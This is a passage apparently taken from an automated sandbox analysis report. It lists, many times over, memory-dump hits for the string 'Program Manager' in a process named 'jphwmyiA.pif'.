                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX<
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`.4!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX7
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qpU/
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q@v`
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXd
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qDm"!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX`
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX]
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qhP+!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q Ln!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXj
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXg
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT')!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXe
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0.B!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qtW6!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q 1{
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXV
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8y^!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qh@i
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(D,
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX!;
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qLR5!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q@5?!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\(f
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXs
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|ik
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXq
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|jM
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXn
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|,*!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4lq!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX|
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qD3q!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXz
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qpQh
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qpRJ
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,?d
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`&<
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4PG!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT&
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT7X!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT"
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(E5!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qhv(!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0G{
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qtO>
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qDG%!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0H]
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX3C!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$3_!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT?
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$0Z
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qh7;
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT>
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT<
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qDq_
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT9
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTF
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|`=
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTC
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$1F
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8Y\
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT-
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT+
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`~_!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|YV!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,AY
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT7
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8ZH
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|a-
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT2
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT_
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT]
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT[
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|[q
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$,z
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qdv6!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTg
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|\S
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qDWD!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTb
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTO
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qHZ^!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\35!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTJ
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,E'!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTX
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,=y
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTT
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlK*!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qtLg
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qtMI
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTz
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q@r#!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q@i!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$.e
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|Pg!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager4
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTl
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTi
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTj
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|]f
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTx
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qDot
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.0000000022D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager(
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`3'!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$4D
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP$
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP"
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qDuI
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager,
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qDtg
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qx\!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0qr!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(N"!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qhK8!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$54
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlIj!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qLZP!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP;
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP9
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPC
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPA
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP?
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8~Q!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP+
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0N<
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qp ,!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qth.!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP(
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP{
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$69
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP0
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP-
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,a[!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q<z<!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q<as
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPY
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,BE
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q@xn!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPV
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPd
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPb
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0JR
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0Ip
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$1m
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPH
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qDrr
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPS
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPT
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qDsT
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4 d!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPM
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qQ/
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8[Q
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8Zo
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]ql :!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.0000000022D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPu
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qD=L!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qph<!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,CN
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP}
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPk
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPl
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPg
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q<ch
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPp
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]ql7
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]ql8
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$"D!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0``
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qxnl
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qDU!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(jF!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qHQW!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]ql<
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qxoN
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]ql9
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]ql$
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlVi
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4hw
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]ql.
